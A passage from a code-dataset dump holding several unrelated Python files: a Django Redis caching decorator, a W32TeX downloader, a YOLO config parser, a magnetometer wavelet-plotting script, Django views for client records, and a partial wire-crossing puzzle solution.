Afecta_user(Afecta=\"SueldoReal\", Descripcion=\"Eres empleado\", User=user, TurnosEsperar=4, TurnosRestante=4, Cantidad=newTurno.Sueldo, Duracion=99999999)\n user_afecta.save()","sub_path":"back/MoneyLifeBack/monyLifeApp/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":29449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"449231651","text":"import functools\nimport traceback\nfrom collections import defaultdict\nfrom functools import wraps\n\nimport hashlib\nimport inspect\nfrom django.conf import settings\nfrom django.core.cache import caches, DEFAULT_CACHE_ALIAS\nfrom django.core.cache.backends.dummy import DummyCache\nfrom django.dispatch import Signal, receiver\n\nfrom django.utils.encoding import force_text, force_bytes\nfrom django_redis import get_redis_connection\n\nMARKER = object()\n\n# 默认缓存1天\nDEFAULT_TIME_OUT = 86400\n\nCACHE_MODEL_FIELD_MAP = defaultdict(lambda: list())\nfrom django.db.models import signals\n\n\n# 保存&删除 清理缓存\n@receiver(signals.post_save)\n@receiver(signals.post_delete)\ndef cache_evict(sender, instance, **kwargs):\n evict_model_cache_signal.send(sender, instance=instance)\n\n\ndef cache_method(\n timeout=DEFAULT_TIME_OUT,\n cache_alias=DEFAULT_CACHE_ALIAS,\n cache_for_function_user=True,\n except_key_gen_args=None,\n evict_register=None\n):\n \"\"\" 缓存方法装饰器\n 注册的模型对象与缓存键的关系,存储在redis的set中\n\n :arg int timeout: 缓存 过期时间,秒\n :arg string 
cache_alias: 缓存别名,默认 'default'\n :arg bool cache_for_function_user : 是否为作为用户缓存,如果是用户缓存,调用方法者(实例对象)需要具有user属性\n :arg tuple except_key_gen_args: 不参与缓存key生成的参数\n :arg tuple evict_register: 注册模型的属性与参数的关系。如果属性与参数名称一直,可以用元组代替字典\n (Model, {model_field_name : arg_name}\n \"\"\"\n def decorator(func):\n def zip_args(*args, **kwargs):\n arg_names = inspect.getfullargspec(func)\n arg_dict = dict(zip(arg_names.args, args))\n return arg_dict\n\n def _default_make_cache_key(*args, **kwargs):\n cache_key = \"\"\n\n arg_dict = zip_args(*args, **kwargs)\n\n if except_key_gen_args:\n for i in except_key_gen_args:\n del arg_dict[i]\n\n if 'self' in arg_dict:\n del arg_dict['self']\n\n if 'cls' in arg_dict:\n del arg_dict['cls']\n\n if cache_for_function_user:\n if len(args) > 0 and hasattr(args[0], 'user'):\n user = getattr(args[0], 'user')\n if user:\n cache_key += \"_user:\" + str(user.id) + \"_\"\n\n cache_key += \"&\".join(\n [force_text(x) for x in list(arg_dict.values())[1:]]\n + [force_text(\"{}={}\".format(k, v)) for k, v in kwargs.items()]\n )\n else:\n cache_key += \"&\".join(\n [force_text(x) for x in arg_dict.values()]\n + [force_text(\"{}={}\".format(k, v)) for k, v in kwargs.items()]\n )\n\n cache_key = ((func.func if isinstance(func,\n functools.partial) else func).__qualname__) + '.' + cache_key\n\n # cache_key = hashlib.md5(force_bytes(cache_key)).hexdigest()\n\n print(cache_key)\n return cache_key\n\n _make_cache_key = _default_make_cache_key\n\n def register(cache_key, *args, **kwargs):\n if evict_register:\n arg_dict = zip_args(*args, **kwargs)\n for r in evict_register:\n models = r['model'] if isinstance(r['model'], (tuple, list)) else (r['model'],)\n\n fields = None\n if hasattr(r, 'field') and r['field']:\n fields = {}\n if isinstance(r['field'], dict):\n for k, v in r['field'].items():\n fields[k] = arg_dict[v]\n else:\n for v in r['field']:\n fields[v] = arg_dict[v]\n\n keys = tuple([k for k in\n (r['field'].keys() if isinstance(r['field'], dict) else r['field'])])\n\n for model in models:\n if keys not in CACHE_MODEL_FIELD_MAP[model]:\n CACHE_MODEL_FIELD_MAP[model].append(keys)\n\n cache_evict_register(model, fields, cache_key, cache_alias)\n _make_cache_key = _default_make_cache_key\n\n @wraps(func)\n def inner(*args, **kwargs):\n cache = caches[cache_alias]\n _refresh = bool(kwargs.pop(\"_refresh\", False))\n cache_key = _make_cache_key(*args, **kwargs)\n register(cache_key, *args, **kwargs)\n\n if _refresh:\n result = MARKER\n else:\n result = cache.get(cache_key, MARKER)\n\n if result is MARKER:\n result = func(*args, **kwargs)\n cache.set(cache_key, result, timeout)\n return result\n\n def invalidate(*args, **kwargs):\n cache = caches[cache_alias]\n kwargs.pop(\"_refresh\", None)\n cache_key = _make_cache_key(*args, **kwargs)\n cache.delete(cache_key)\n\n inner.invalidate = invalidate\n return inner\n\n return decorator\n\n\ndef cache_evict_register(model: object, fields: dict, cache_key: str, cache_alias=DEFAULT_CACHE_ALIAS):\n \"\"\"\n 注册model-instance对应的所有的 缓存键,缓存键 以set的方式存储在redis中\n :param model: 模型类\n :param fields: 模型实例的属性值\n :param cache_key: 缓存键\n :param cache_alias:\n :return:\n \"\"\"\n if not _is_dummy_cache(cache_alias):\n register_key = _generate_cache_evict_key(model, fields, cache_alias)\n get_redis_connection().sadd(register_key, cache_key)\n\n\ndef _is_dummy_cache(alias):\n return isinstance(caches[alias], DummyCache)\n\n\ndef _generate_cache_evict_key(model, fields: dict, cache_alias=DEFAULT_CACHE_ALIAS):\n \"\"\"\n 生成缓存set键\n :param model: 模型类\n :param 
fields: 模型实例的属性值\n :param cache_alias:\n :return:\n \"\"\"\n prefix = None\n try:\n prefix = settings.CACHES[cache_alias]['REGISTER_KEY_PREFIX']\n except KeyError:\n traceback.print_exc()\n else:\n pass\n register_key = (prefix + ':' if prefix else '') + force_text(model) + \"@\" + (\"&\".join(\n [force_text(k) + \":\" + force_text(v) for k, v in fields.items()]) if fields else \"\")\n\n return register_key\n\n\n# 模型单个实例变动清除信号\nevict_model_cache_signal = Signal()\n# 模型批量变动 清除信号\nevict_model_bulk_caches_signal = Signal()\n\n\n@receiver(evict_model_cache_signal)\ndef evict_model_cache(sender, instance, **kwargs):\n \"\"\"\n 清除单个实例变更的缓存\n :param sender: 模型类\n :param instance: 模型类实例\n :param kwargs:\n :return:\n \"\"\"\n print('----cache evict------')\n # print(instance)\n # print(sender)\n # print(kwargs)\n # print(CACHE_MODEL_FIELD_MAP)\n\n if sender in CACHE_MODEL_FIELD_MAP:\n cache_field_groups = CACHE_MODEL_FIELD_MAP[sender]\n fields = {}\n for fg in cache_field_groups:\n for f in fg:\n if hasattr(instance, f):\n fields[f] = getattr(instance, f)\n\n for cache_alias in settings.CACHES.keys():\n if not _is_dummy_cache(cache_alias):\n register_key = _generate_cache_evict_key(sender, fields, cache_alias)\n keys = get_redis_connection().smembers(register_key)\n for cache_key in keys:\n try:\n caches[cache_alias].delete(force_text(cache_key))\n except:\n traceback.print_exc()\n get_redis_connection().delete(register_key)\n\n\n@receiver(evict_model_bulk_caches_signal)\ndef evict_model_bulk_caches(sender, **kwargs):\n \"\"\"\n TODO 批量清除更好的方法\n 批量清除缓存 bulk_update & bulk_delete\n :param sender:\n :param kwargs:\n :return:\n \"\"\"\n if sender in CACHE_MODEL_FIELD_MAP:\n for cache_alias in settings.CACHES.keys():\n if not _is_dummy_cache(cache_alias):\n print(sender)\n print(cache_alias)\n register_key_regex = _generate_cache_evict_key(sender, None, cache_alias) + \"*\"\n print(register_key_regex)\n\n register_keys = get_redis_connection().keys(register_key_regex)\n for register_key in register_keys:\n set_key = force_text(register_key)\n keys = get_redis_connection().smembers(set_key)\n print(keys)\n for cache_key in keys:\n try:\n caches[cache_alias].delete(force_text(cache_key))\n except:\n traceback.print_exc()\n get_redis_connection().delete(*register_keys)\n# evict_model_cache_signal.connect(evict_model_cache)\n","sub_path":"python/django/demo/lib/cache_method/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"26866853","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport urllib.request\nimport os\nimport argparse\n\ndef jsonToFileNames(path) :\n arr = []\n with open(path) as f:\n arr = json.load(f)\n return arr\n\ndef fileNamesToUris(baseuri, fileNames) :\n return [baseuri + fileName for fileName in fileNames]\n\ndef download(uri, dir) :\n fileName = uri.rsplit('/', 1)[1].split('?')[0]\n path = os.path.join(dir, fileName)\n urllib.request.urlretrieve(uri, path)\n\ndef createDir(dir) :\n if not os.path.exists(dir) :\n os.makedirs(dir)\n return dir\n\ndef main():\n #---------------------------------------------------------------------------\n # option parser\n #---------------------------------------------------------------------------\n parser = argparse.ArgumentParser(description = 'This script downloads w32tex files.')\n parser.add_argument('-b', '--baseuri', dest = 'baseuri', required = True, help='''target uri's base string.''')\n parser.add_argument('-j', 
'--json' , dest = 'json' , required = True, help='''target file name.''' )\n parser.add_argument('-t', '--target' , dest = 'target' , required = True, help='''files download to this.''' )\n args = parser.parse_args()\n \n fileNames = jsonToFileNames(args.json)\n uris = fileNamesToUris(args.baseuri, fileNames)\n targetDir = createDir(args.target)\n for uri in uris :\n print('download... ' + uri)\n download(uri, targetDir)\n\nif __name__ == \"__main__\":\n main()","sub_path":"W32TexDownloader.py","file_name":"W32TexDownloader.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"132126658","text":"# This file will contain the code that creates the YOLO network.\n\nfrom __future__ import division\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport numpy as np\n\n\ndef parse_config(config_file):\n\t\"\"\"\n\tTakes a configuration file\n\n\tReturns a list of blocks. Each blocks describes a block in the neural\n\tnetwork to be built. Block is represented as a dictionary in the list\n\n\t\"\"\"\n\tfile = open(config_file, 'r')\n\tlines = file.read().split('\\n') # store the lines in a list\n\tlines = [x for x in lines if len(x) > 0] # get read of the empty lines\n\tlines = [x for x in lines if x[0] != '#'] # get rid of comments\n\tlines = [x.rstrip().lstrip() for x in lines] # get rid of fringe whitespaces\n\n\tblock = {}\n\tblocks = []\n\n\tfor line in lines:\n\t\tif line[0] == \"[\": # This marks the start of a new block\n\t\t\tif len(block) != 0: # If block is not empty, implies it is storing values of previous block.\n\t\t\t\tblocks.append(block) # add it the blocks list\n\t\t\t\tblock = {} # re-init the block\n\t\t\tblock[\"type\"] = line[1:-1].rstrip()\n\t\telse:\n\t\t\tkey, value = line.split(\"=\")\n\t\t\tblock[key.rstrip()] = value.lstrip()\n\tblocks.append(block)\n\n\treturn blocks\n\ndef create_modules(blocks):\n\tnet_info = blocks[0] #Captures the information about the input and pre-processing\n\tmodule_list = nn.ModuleList()\n\tprev_filters = 3\n\toutput_filters = []\n\n\nparse_config(\"../config/cnn.config\")","sub_path":"src/darknet.py","file_name":"darknet.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"288884309","text":"\"\"\"\nName: Test_SpatialOperators.py\nAuthor: Sid Bishnu\nDetails: As the name implies, this script tests the various spatial operators of DGSEM computed in \n../../src/DGSEM_Rotating_Shallow_Water/SpatialOperators.py against their exact counterparts using smooth \ntwo-dimensional functions.\n\"\"\"\n\n\nimport os\nimport sys\nsys.path.append(os.path.realpath('../..') + '/src/DGSEM_Rotating_Shallow_Water/')\nfrom IPython.utils import io\nwith io.capture_output() as captured:\n import SpatialOperators as SO\n \n \ndef TestConvergenceStudyOfSpatialOperators():\n nXiMinimum = 2\n nXiMaximum = nXiMinimum + 2\n WriteState = True\n PlotAgainstNumberOfCellsInZonalDirection = True\n UseBestFitLine = True\n set_xticks_manually = False\n ReadFromSELFOutputData = True\n if ReadFromSELFOutputData:\n ReadDivergenceErrorNorm = False\n else:\n ReadDivergenceErrorNorm = True\n for nXi in range(nXiMinimum,nXiMaximum+1):\n if not(ReadFromSELFOutputData):\n SO.ConvergenceStudyOfSpatialOperators(nXi,WriteState)\n SO.PlotConvergenceDataOfSpatialOperators(nXi,PlotAgainstNumberOfCellsInZonalDirection,UseBestFitLine,\n 
set_xticks_manually,ReadFromSELFOutputData,ReadDivergenceErrorNorm)\n SO.PlotConvergenceDataOfAllSpatialOperators(nXiMinimum,PlotAgainstNumberOfCellsInZonalDirection,UseBestFitLine,\n set_xticks_manually,ReadFromSELFOutputData,ReadDivergenceErrorNorm)\n \n \ndo_TestConvergenceStudyOfSpatialOperators = False\nif do_TestConvergenceStudyOfSpatialOperators:\n TestConvergenceStudyOfSpatialOperators()","sub_path":"tests/DGSEM_Rotating_Shallow_Water_Tests/Test_SpatialOperators.py","file_name":"Test_SpatialOperators.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"643021488","text":"#!/usr/bin/env python2\nimport argparse,datetime,math,matplotlib,mlpy,numpy,os,struct,sys\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nfrom gwpy.plotter import SpectrogramPlot\nfrom gwpy.timeseries import TimeSeries\nfrom matplotlib.ticker import LogLocator\nfrom scipy import fftpack,signal\n\ndef plot_spectrogram(data,tmin=None,tmax=None,fmin=None,fmax=None,vmin=None,vmax=None,\n mmax=None,mmin=None,mode='wavelet',omega0=6,dj=0.05,fct='morlet',\n stride=None,nfft=None,overlap=None,scale='log',\n funit='Hz',tunit='secs',cmap='inferno',zone='Local',fname=None):\n \"\"\"\n Plot multiplot figure with time series, PSD and spectrogram.\n\n Parameters\n ----------\n data : TimeSeries\n Magnetic field data\n tmin, tmax : datetime\n First and last timestamps\n fmin, fmax : float\n Minimum and maximum frequencies\n vmin, vmax : float\n Minimum and maximum color values\n mode : str\n Spectrogram mode, wavelet or Fourier. Default is Fourier\n omega0 : int\n Wavelet function parameter\n dj : float\n Scale resolution (smaller values of dj give finer resolution)\n fct : str\n Wavelet function (morlet,paul,dog)\n stride : float\n Length of segment\n nfft : float\n Length of FFT\n overlap : float\n Length of overlapping segment\n cmap : str\n Colormap\n scale : str\n Plotted frequency scale. Default is \"log\".\n funit : strg\n Frequency unit, Hz or mHz. Default is Hz.\n tunit : str\n Time unit, secs, mins or hrs. Default is mins.\n fname : str\n Output file name.\n \n Notes\n -----\n The `matplotlib.pyplot.imshow <https://matplotlib.org/api/pyplot_api.html?highlight=matplotlib%20pyplot%20imshow#matplotlib.pyplot.imshow>`_ module is\n used to plot the wavelet spectrogram. This module is usually used\n to plot raw images and assumes that the position of the cell in the\n input spectrogram array directly represents the position of the pixel\n in the raw image. That is, for an input Python array (in which rows\n are appended below previous ones), the first row in the array is\n assumed to represent the top line of pixel in the image. Therefore,\n in order to plot the spectrogram array using the imshow module, one\n needs to carefully check that the rows (which are representative of\n the frequency bands), are stored in descending order such that the\n lowest frequency is placed at the end (bottom) of the array.\n \"\"\"\n if mode=='wavelet' and scale=='linear':\n print('Warning: Wavelet mode chosen. 
Scale will be changed to log.')\n scale = 'log'\n # Initialise figure\n fig = plt.figure(figsize=(24,14),frameon=False)\n plt.subplots_adjust(left=0.07, right=0.95, bottom=0.1, top=0.95, hspace=0, wspace=0)\n ax1 = fig.add_axes([0.20,0.75,0.683,0.20])\n ax2 = fig.add_axes([0.20,0.10,0.683,0.64], sharex=ax1)\n ax3 = fig.add_axes([0.07,0.10,0.123,0.64])\n ax4 = fig.add_axes([0.89,0.10,0.030,0.64])\n # Prepare timing range\n tmin = data.times[0].value if tmin==None else tmin\n tmax = data.times[-1].value if tmax==None else tmax\n mask = (data.times.value>=tmin) & (data.times.value<=tmax)\n scale_factor = 3600. if tunit=='hrs' else 60. if tunit=='mins' else 1\n times = (data[mask].times.value-tmin)/scale_factor\n dt = 1./data.sample_rate.value\n # Plot time series\n ax1.plot(times,data[mask].value,alpha=0.5)\n ax1.set_ylabel('Magnetic Fields [uT]',fontsize=11)\n ax1.tick_params(bottom='off',labelbottom='off')\n if mmin!=None: ax1.set_ylim(ymin=mmin)\n if mmax!=None: ax1.set_ylim(ymax=mmax)\n ax1.set_xlim(0,(tmax-tmin)/scale_factor)\n ax1.grid(b=True, which='major', alpha=0.7, ls='--')\n if mode=='wavelet':\n # Calculate wavelet parameters\n scales = mlpy.wavelet.autoscales(N=len(data[mask].value),dt=dt,dj=dj,wf=fct,p=omega0)\n spec = mlpy.wavelet.cwt(data[mask].value,dt=dt,scales=scales,wf=fct,p=omega0)\n freq = (omega0 + numpy.sqrt(2.0 + omega0 ** 2)) / (4 * numpy.pi * scales[1:])\n freq = freq * 1000. if funit=='mHz' else freq\n spec = numpy.abs(spec)**2\n spec = spec[::-1]\n # Define minimum and maximum frequencies\n fmin_log,fmax_log = min(freq),max(freq)\n fmin_linear,fmax_linear = min(freq),max(freq)\n if fmin!=None:\n log_ratio = (numpy.log10(fmin)-numpy.log10(min(freq)))/(numpy.log10(max(freq))-numpy.log10(min(freq)))\n fmin_linear = min(freq)+log_ratio*(max(freq)-min(freq))\n fmin_log = fmin\n if fmax!=None:\n log_ratio = (numpy.log10(fmax)-numpy.log10(min(freq)))/(numpy.log10(max(freq))-numpy.log10(min(freq)))\n fmax_linear = min(freq)+log_ratio*(max(freq)-min(freq))\n fmax_log = fmax\n # Get minimum and maximum amplitude in selected frequency range\n idx = numpy.where(numpy.logical_and(fmin_log<freq[::-1],freq[::-1]<fmax_log))[0]\n vmin = vmin if vmin!=None else numpy.sort(numpy.unique(spec[idx]))[1]\n vmax = spec[idx].max() if vmax==None else vmax\n # Plot spectrogram\n img = ax2.imshow(spec,extent=[times[0],times[-1],freq[-1],freq[0]],aspect='auto',\n interpolation='nearest',cmap=cmap,norm=matplotlib.colors.LogNorm(vmin,vmax)) \n ax2.set_xlabel('Time [%s] from %s %s (%s)'%(tunit,datetime.utcfromtimestamp(tmin),zone,tmin),fontsize=15)\n ax2.set_xlim(0,(tmax-tmin)/scale_factor)\n ax2.set_yscale('linear')\n ax2.set_ylim(fmin_linear,fmax_linear)\n ax2.grid(False)\n # Set up axis range for spectrogram\n twin_ax = ax2.twinx()\n twin_ax.set_yscale('log')\n twin_ax.set_xlim(0,(tmax-tmin)/scale_factor)\n twin_ax.set_ylim(fmin_log,fmax_log)\n twin_ax.spines['top'].set_visible(False)\n twin_ax.spines['right'].set_visible(False)\n twin_ax.spines['bottom'].set_visible(False)\n ax2.tick_params(which='both', labelleft=False, left=False)\n twin_ax.tick_params(which='both', labelleft=False,left=False, labelright=False, right=False)\n twin_ax.grid(False)\n if mode=='fourier':\n freq, times, spec = signal.spectrogram(data[mask],fs=data.sample_rate.value,\n nperseg=stride,noverlap=overlap,nfft=nfft)\n # Convert time array into minute unit\n times = (numpy.linspace(data[mask].times.value[0],data[mask].times.value[-1],len(times))-tmin)/scale_factor\n # Define minimum and maximum frequencies\n freq = 
freq * 1000. if funit=='mHz' else freq\n fmin = freq[1] if fmin==None else fmin\n fmax = max(freq) if fmax==None else fmax\n fmin_log,fmax_log = fmin,fmax\n # Get minimum and maximum amplitude in selected frequency range\n idx = numpy.where(numpy.logical_and(fmin<=freq,freq<=fmax))[0]\n vmin = vmin if vmin!=None else numpy.sort(numpy.unique(spec[idx]))[1]\n vmax = spec[idx].max() if vmax==None else vmax\n # Plot spectrogram\n img = ax2.pcolormesh(times,freq,spec,cmap=cmap,norm=matplotlib.colors.LogNorm(vmin,vmax))\n ax2.set_xlabel('Time [%s] from %s %s (%s)'%(tunit,datetime.utcfromtimestamp(tmin),zone,tmin),fontsize=15)\n ax2.set_xlim(0,(tmax-tmin)/scale_factor)\n ax2.set_ylim(fmin,fmax)\n ax2.set_yscale(scale)\n ax2.set_ylabel('Frequency [%s]'%funit,fontsize=15,labelpad=40)\n ax2.tick_params(which='both', labelleft=False, left=False)\n ax2.grid(False)\n # Calculate Power Spectral Density\n N = len(data[mask].value)\n delta_t = 1/data.sample_rate.value\n delta_f = 1. / (N * delta_t)\n f = delta_f * numpy.arange(N / 2)\n f = f * 1000. if funit=='mHz' else f\n PSD = abs(delta_t * fftpack.fft(data[mask].value)[:N / 2]) ** 2\n psd = numpy.vstack((f,PSD)).T\n # Plot Power Spectral Density\n ticks = matplotlib.ticker.FuncFormatter(lambda v,_:(\"$10^{%.0f}$\"%math.log(v,10)))\n ax3.loglog(psd[:,1],psd[:,0],alpha=0.5)\n ax3.invert_xaxis()\n ax3.set_ylim(fmin_log,fmax_log)\n ax3.set_ylabel('Frequency [%s]'%funit,fontsize=15)\n ax3.set_xlabel('PSD',fontsize=15)\n ax3.grid(b=True, which='major', alpha=0.7, ls='--')\n # Add color bar and save figure\n cb = fig.colorbar(img,cax=ax4)\n cb.set_ticks(LogLocator())\n cb.set_clim(vmin,vmax)\n ax4.set_ylabel('Power $|\\mathrm{W}_v|^2$ $[\\mu T^2/\\mathrm{Hz}]$',fontsize=15)\n plt.show() if fname==None else plt.savefig(fname)#,frameon=False)\n plt.close(fig)\n\n# Extract input arguments\nparser = argparse.ArgumentParser(prog='vmr_wavelet',description='Make wavelet from VMR data.')\nparser.add_argument(\"-f\",\"--logfile\",help='Log filename: log.bin',required=True)\nparser.add_argument(\"-r\",\"--rate\", default=None,type=float,help='Targeted sampling rate')\nparser.add_argument(\"-o\",\"--out\", default='wavelet.png',help='Output figure name')\nparser.add_argument(\"--tmin\", default=None,type=float,help='Start timestamp')\nparser.add_argument(\"--tmax\", default=None,type=float,help='End timestamp')\nparser.add_argument(\"--mmin\", default=None,type=float,help='Minimum magnetic field')\nparser.add_argument(\"--mmax\", default=None,type=float,help='Maximum magnetic field')\nparser.add_argument(\"--ufactor\", default=1.,type=float,help='Factor from local to uT')\nargs = parser.parse_args()\n# Read binary file and store floating values in numpy array\nwith open(args.logfile,'rb') as f:\n data = f.read()\n size = int(len(data)/32)\n data = struct.unpack('dddd'*size,data)\n data = numpy.reshape(data,(size,4))\n# Identify samples to discard\nif args.tmin!=None:\n idxs = numpy.where(data[:,0]<args.tmin)[0]\n data = numpy.delete(data,idxs,axis=0)\nif args.tmax!=None:\n idxs = numpy.where(data[:,0]>args.tmax)[0]\n data = numpy.delete(data,idxs,axis=0)\n# Check targeted sampling rate if mentioned\nsample_rate = int(1/numpy.average([data[i+1,0]-data[i,0] for i in range(len(data)-1)]))\ntarget_rate = float(sample_rate) if args.rate==None else float(args.rate)\ndownsampling = sample_rate/target_rate\nif (downsampling).is_integer()==False:\n print(\"ERROR: Data sampling rate (%i) not divisible by targeted rate (%i)\"%(sample_rate,target_rate))\n quit()\n# Print out first 
and last timestamp values\ntimes = data[:,0]\ndate0 = datetime.fromtimestamp(times[0]).strftime('%Y-%m-%d %H:%M:%S.%f')\ndate1 = datetime.fromtimestamp(times[-1]).strftime('%Y-%m-%d %H:%M:%S.%f')\nprint(len(data),'data points were streamed from %s to %s'%(date0,date1))\n# Calculate scalar value of magnetic field for each sample\nscalar = numpy.sqrt(numpy.sum(abs(data[:,1:]/args.ufactor)**2,axis=1))\nscalar = signal.resample(scalar,int(len(scalar)/downsampling))\nprint('Data are resampled by a factor',downsampling,'from',sample_rate,'down to',target_rate,'sample/sec.')\n# Store data into GwPy time series format\ndata = TimeSeries(scalar,sample_rate=target_rate,epoch=times[0])\n# Plot wavelet spectrogram\ntmin = times[0] if args.tmin==None else args.tmin\ntmax = times[-1] if args.tmax==None else args.tmax\nmmin = min(data.value) if args.mmin==None else args.mmin\nmmax = max(data.value) if args.mmax==None else args.mmax\nname = 'wavelet_%i-%i'%(tmin,tmax) if args.out==None else args.out\nplot_spectrogram(data,fname=name,tunit='mins',tmin=tmin,tmax=tmax,mmin=mmin,mmax=mmax)\n","sub_path":"bin/vmr_wavelet.py","file_name":"vmr_wavelet.py","file_ext":"py","file_size_in_byte":11347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"328886433","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.template.loader import get_template\nfrom django.views.generic import TemplateView\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.conf import settings\nfrom lister.models import Info\nfrom lister.models import Client\nfrom lister.models import Type\nimport ipaddress\nfrom django.core.validators import URLValidator\nfrom django.core.exceptions import ValidationError\n\n# Table of keys\nclass UpdateView(TemplateView):\n template_name = 'update.html'\n def get(self, request, **kwargs):\n info = Info.objects.all()\n client = Client.objects.all()\n type = Type.objects.all()\n return render(request, self.template_name, {'info' : info, 'client': client, 'type' : type})\n\nclass AddView(TemplateView):\n template_name = 'add.html'\n def get(self, request, **kwargs):\n info = Info.objects.all()\n client = Client.objects.all()\n type = Type.objects.all()\n return render(request, self.template_name, {'info' : info, 'client': client, 'type' : type})\n\nclass PleaseLog(TemplateView):\n def get(self, request, **kwargs):\n messages.error(request, 'Veuillez vous connecter')\n return HttpResponseRedirect( settings.LOGIN_REDIRECT_URL )\n# Login\nclass LoginView(TemplateView):\n template_name = 'index.html'\n\n def post(self, request, **kwargs):\n username = request.POST.get('username', False)\n password = request.POST.get('password', False)\n user = authenticate(username=username, password=password)\n if user is not None and user.is_active:\n login(request, user)\n messages.success(request, 'Connexion réussie')\n return HttpResponseRedirect( settings.LOGIN_REDIRECT_URL )\n else:\n messages.error(request, 'Mot de passe incorrect')\n return HttpResponseRedirect( settings.LOGIN_REDIRECT_URL )\n return render(request, self.template_name)\n def get(self, request, **kwargs):\n info = Info.objects.all()\n client = Client.objects.all()\n type = Type.objects.all()\n return render(request, self.template_name, {'info' : info, 'client': client, 'type' : type})\n\nclass DeleteInfo(TemplateView):\n template_name = 'index.html'\n def post(self, request, **kwargs):\n infoid = request.POST.get('info_id', False)\n Info.objects.filter(id=infoid).delete()\n messages.success(request, \"L'info a bien été supprimée\")\n return HttpResponseRedirect( \"/update/\" )\n\nclass UpdateInfo(TemplateView):\n template_name = 'index.html'\n def post(self, request, **kwargs):\n ip = request.POST.get('ip', False) \n try:\n ipaddress.ip_address(ip)\n except:\n messages.error(request, 'Mauvais format IP')\n return HttpResponseRedirect( \"/update/\" )\n url = request.POST.get('url', False)\n try:\n URLValidator()(url)\n except:\n messages.error(request, 'Mauvaise URL')\n return HttpResponseRedirect( \"/update/\" ) \n clientnom = request.POST.get('client', False)\n hostname = request.POST.get('hostname', False)\n typenom = request.POST.get('type', False)\n try:\n clientid = Client.objects.get(nom=clientnom).id\n typeid = Type.objects.get(nom=typenom).id\n except:\n messages.error(request, 'Mauvais client ou type')\n return HttpResponseRedirect( \"/update/\" )\n formid = request.POST.get('formid', False)\n try:\n Info.objects.filter(id=formid).update(url=url, ip=ip, cli_id=clientid, typ_id = typeid, hostname=hostname)\n messages.success(request, \"L'info a bien été modifiée\")\n return HttpResponseRedirect( \"/update/\" )\n except:\n messages.error(request, \"Impossible de mettre a jour l'info\")\n return HttpResponseRedirect( \"/update/\" )\n\nclass AjouterType(TemplateView):\n template_name = \"index.html\"\n def post(self, request, **kwargs):\n typenom = request.POST.get('type', False)\n try:\n t = Type(nom=typenom)\n t.save()\n messages.success(request, 'Le type a bien été ajouté')\n return HttpResponseRedirect( \"/add/\" )\n except:\n messages.error(request, \"Impossible de créer un type\")\n return HttpResponseRedirect( \"/add/\" )\n\nclass AjouterClient(TemplateView):\n template_name = \"index.html\"\n def post(self, request, **kwargs):\n clientnom = request.POST.get('client', False)\n try:\n c = Client(nom=clientnom)\n c.save()\n messages.success(request, 'Le client a bien été ajouté')\n return HttpResponseRedirect( \"/add/\" )\n except:\n messages.error(request, \"Impossible de créer un client\")\n return HttpResponseRedirect( \"/add/\" )\n\nclass AjouterInfo(TemplateView):\n template_name = \"index.html\"\n def post(self, request, **kwargs):\n ip = request.POST.get('ip', False) \n try:\n ipaddress.ip_address(ip)\n except:\n messages.error(request, 'Mauvais format IP')\n return HttpResponseRedirect( \"/add/\" )\n url = request.POST.get('url', False)\n try:\n URLValidator()(url)\n except:\n messages.error(request, 'Mauvaise URL')\n return HttpResponseRedirect( \"/add/\" ) \n clientnom = request.POST.get('client', False)\n hostname = request.POST.get('hostname', False)\n typenom = request.POST.get('type', False)\n try:\n clientid = Client.objects.get(nom=clientnom).id\n typeid = Type.objects.get(nom=typenom).id\n except:\n messages.error(request, \"Mauvais client ou type\")\n return HttpResponseRedirect( \"/add/\" )\n try:\n i = Info(ip=ip, hostname=hostname, url=url, cli_id = clientid, typ_id = typeid)\n i.save()\n messages.success(request, \"L'info a bien été ajoutée\")\n return HttpResponseRedirect( \"/add/\" )\n except:\n messages.error(request, \"Impossible de créer une info\")\n return HttpResponseRedirect( \"/add/\" )\n# Logout\nclass LogoutView(TemplateView):\n template_name = 'index.html'\n\n def get(self, request, **kwargs):\n logout(request)\n return HttpResponseRedirect( settings.LOGIN_REDIRECT_URL 
)\n","sub_path":"lister/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"35261228","text":"import day01\n\ndef get_delta(a_dir):\n dirs = {'L': (-1, 0), 'U': (0, 1), 'R': (1, 0), 'D': (0, -1)}\n try:\n return dirs[a_dir]\n except KeyError:\n print(f'Unknown direction {a_dir}')\n\ndef all_cable_coordinates(cable_dirs, a_start=(0, 0)):\n coords = [a_start]\n\n for cd in cable_dirs:\n last_coord = coords[-1]\n my_delta = get_delta(cd[0])\n distance = int(cd[1:])\n coords += [(last_coord[0]+my_delta[0]*j, last_coord[1]+my_delta[1]*j) for j in range(1, distance+1)]\n\n return coords\n\ndef prep(content):\n cable1 = content[0].split(',')\n cable2 = content[1].split(',')\n cable1_coords = all_cable_coordinates(cable1)\n cable2_coords = all_cable_coordinates(cable2)\n # find shared coordinates\n shared = list(set(cable1_coords) & set(cable2_coords))\n shared.pop(shared.index((0, 0)))\n return cable1_coords, cable2_coords, shared\n\ndef part1(cable1_coords, cable2_coords, shared):\n min_manhatten = 10e10\n for x in shared:\n man = abs(x[0])+abs(x[1])\n if man < min_manhatten:\n min_manhatten = man\n 